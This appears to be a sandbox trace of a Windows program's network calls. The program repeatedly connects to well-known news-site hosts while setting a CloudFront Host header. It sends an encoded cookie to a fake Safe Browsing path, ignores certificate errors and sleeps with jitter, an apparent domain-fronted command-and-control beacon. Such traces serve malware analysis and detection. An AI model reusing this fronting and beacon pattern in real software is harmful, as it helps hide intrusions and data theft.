Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:51 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:51 (Local Time) True 1
Fn
System Sleep duration = 12857 milliseconds (12.857 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:02 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:02 (Local Time) True 1
Fn
System Sleep duration = 12915 milliseconds (12.915 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:13 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:13 (Local Time) True 1
Fn
System Sleep duration = 13016 milliseconds (13.016 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:23 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:23 (Local Time) True 1
Fn
System Sleep duration = 12999 milliseconds (12.999 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:34 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:34 (Local Time) True 1
Fn
System Sleep duration = 13358 milliseconds (13.358 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:45 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:45 (Local Time) True 1
Fn
System Sleep duration = 13296 milliseconds (13.296 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:56 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:32:56 (Local Time) True 1
Fn
System Sleep duration = 13658 milliseconds (13.658 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:07 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:07 (Local Time) True 1
Fn
System Sleep duration = 12319 milliseconds (12.319 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:18 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:18 (Local Time) True 1
Fn
System Sleep duration = 12815 milliseconds (12.815 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:28 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:28 (Local Time) True 1
Fn
System Sleep duration = 13671 milliseconds (13.671 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:39 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:39 (Local Time) True 1
Fn
System Sleep duration = 12728 milliseconds (12.728 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:50 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:50 (Local Time) True 1
Fn
System Sleep duration = 13107 milliseconds (13.107 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:01 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:01 (Local Time) True 1
Fn
System Sleep duration = 12762 milliseconds (12.762 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:11 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:11 (Local Time) True 1
Fn
System Sleep duration = 14342 milliseconds (14.342 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:22 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:22 (Local Time) True 1
Fn
System Sleep duration = 12928 milliseconds (12.928 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
